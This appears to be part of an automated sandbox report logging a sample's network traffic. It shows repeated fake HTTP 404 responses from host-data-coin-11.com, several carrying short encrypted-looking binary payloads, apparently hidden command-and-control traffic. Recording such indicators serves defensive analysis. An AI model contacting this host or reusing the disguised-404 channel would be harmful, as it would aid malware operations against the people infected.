                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 b4 a4 8e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1eI:82OI%0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 49 01 7f 05 f1 b4 89 a1 bd 1e b6 10 da 2c b9 53 4b db 12 e1 a4 2a ef 24 41 1b b2 ed 93 5a fd 0d 86 13 82 bd 38 87 22 ed ae 8d 58 7a e2 b2 4c 29 f4 bd e3 3d a1 c8 bc 5b ab 21 96 c4 33 43 5f 6c 0c 4c 8e f2 3d e3 fe 07 c3 b2 d9 5d 91 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OI,SK*$AZ8"XzL)=[!3C_lL=]`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 53 5e 98 3d a0 e4 66 b1 7b 1b 1b a4 fc 0d 0a 30 0d 0a 0d 0a Data Ascii: 31I:82OTevS^=f{0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 04 48 c6 35 d0 d8 66 ea 25 5e 1b ee a8 88 1c bf 55 c7 17 9e ab 0d 0a 30 0d 0a 0d 0a Data Ascii: 39I:82OTevH5f%^U0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 41 6f c6 15 eb f8 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevAofdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
